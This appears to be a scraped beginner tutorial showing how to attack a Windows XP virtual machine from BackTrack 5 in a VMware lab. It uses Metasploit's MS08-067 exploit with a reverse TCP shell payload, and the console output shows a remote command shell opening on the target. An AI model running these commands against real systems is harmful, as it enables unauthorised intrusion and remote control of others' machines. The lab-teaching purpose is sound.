Anda di halaman 1dari 11

BACKTRACK 5

LEARN TO CONFIG AND RUN COMMANDS TO PENETRATE A XP MACHINE

FIRSTLY
DOWNLOAD BACKTRACK vmx format FROM @ http://www.backtrack-linux.org/downloads/

SECONDLY.
Run VMWARE and load xp machine and the backtrack vmx machine.
In this VM labthe XP machine terminal is attacked by the BT terminal

THIRDLY.config IP address to BT machine

Here the IP configured is 80.0.2.251

FOURTHLY.config IP address to XP machine

Here the IP configured is 80.0.2.252

FIFTHLY..
NOW JUST TO MAKE A SMALL CHECK OF CONNECTIONS..DO THE BRIDGING AND PING BOTH THE MACHINES FROM BOTH TERMINALS

SIXTHLY..run the following on the BT terminal


root@bt:~# cd /pentest/exploits/framework3 root@bt:/pentest/exploits/framework3#

root@bt:/pentest/exploits/framework3# ./msfconsole
o 8 o o 8 8 8 ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P 8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8 8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8 8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8 ..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..: ::::::::::::::::::::::::::::::::::8::::::::::::::::::::::: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

=[ metasploit v3.7.0-release [core:3.7 api:1.0] + -- --=[ 684 exploits - 355 auxiliary + -- --=[ 217 payloads - 27 encoders - 8 nops =[ svn r12536 updated 169 days ago (2011.05.04) Warning: This copy of the Metasploit Framework was last updated 169 days ago. We recommend that you update the framework at least every other day. For information on updating your copy of Metasploit, please see: http://www.metasploit.com/redmine/projects/framework/wiki/Updating

RED DENOTES COMMANDS TO TYPED.minimal!!!!

THE BE

msf >

msf > msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 80.0.2.252 RHOST => 80.0.2.252 msf exploit(ms08_067_netapi) > set LHOST 80.0.2.251 LHOST => 80.0.2.251 msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 80.0.2.251:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 3 - lang:English [*] Selected Target: Windows XP SP3 English (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (240 bytes) to 80.0.2.252 [*] Command shell session 1 opened (80.0.2.251:4444 -> 80.0.2.252:1133) at 2011-10-20 05:15:55 -0400 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

RED DENOTES COMMANDS TO TYPED.minimal!!!!

THE BE

C:\WINDOWS\system32> u r done!!!!!!!!!!!!!!!!!!

Any questions????
please message or mail at anupam@blumail.org